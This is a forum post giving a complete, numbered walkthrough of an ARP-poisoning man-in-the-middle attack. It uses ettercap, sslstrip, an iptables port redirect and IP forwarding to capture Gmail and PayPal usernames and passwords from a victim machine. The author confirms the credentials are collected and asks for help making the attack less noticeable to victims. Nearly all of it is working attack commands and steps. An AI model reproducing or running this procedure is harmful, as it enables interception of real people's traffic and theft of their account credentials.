I attempted to respond all last week but the forums were down every time I tried.
I finally got the whole process to work, though I'm not sure what I did differently. The only thing I changed was I ran ettercap in GUI mode. The whole process for me was as follows for anyone else who finds themselves having the same problem I was.
BT4 - Attacker (on VMWare): 192.168.1.6 - Wireless, bridged, iface - eth0
Ubuntu64 - Victim (on VMWare): 192.168.1.9
Router (Default Gateway) - Asus RT-N10: 192.168.1.1
1. edit etter.conf as instructed in the tutorial
2. echo 1 > /proc/sys/net/ipv4/ip_forward
3. Check /proc/.../ip_forward
output should be '1'
4. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5. (in a new konsole) sslstrip -a -k -f
6. ettercap -G
##At this point, Ettercap GUI will pop up -- follow these steps##
7. Sniff-> Unified Sniffing-> Network Interface: eth0
8. Hosts-> Scan for Hosts
9. Hosts-> Hosts List (H)
10. Select 192.168.1.1 (gateway)-> Click 'Add to Target 1'
11. Select 192.168.1.9 (victim)-> Click 'Add to Target 2'
12. MITM-> Arp Poisoning-> Check 'Sniff Remote Connections'-> Ok
13. Start-> Start Sniffing
##Switch to victim machine and log into gmail or paypal##
14. Observe USER and PASS coming through in Ettercap's output window.
15. end the MITM, stop sniffing, kill sslstrip, and run iptables --flush when you're all done.
Everything works as it should -- I'm not sure why running the GUI made any difference. The only other problem I'm having in the whole process is that probably about 66% of the time when trying to log into gmail or paypal, it doesn't go through properly. I collect the username and password without any problem but it seems to just refresh the gmail login screen more than half the time, rather than taking me to the inbox. It still gets the job done, but if they're alerted to an ARP spoofing it makes the process a little sloppy.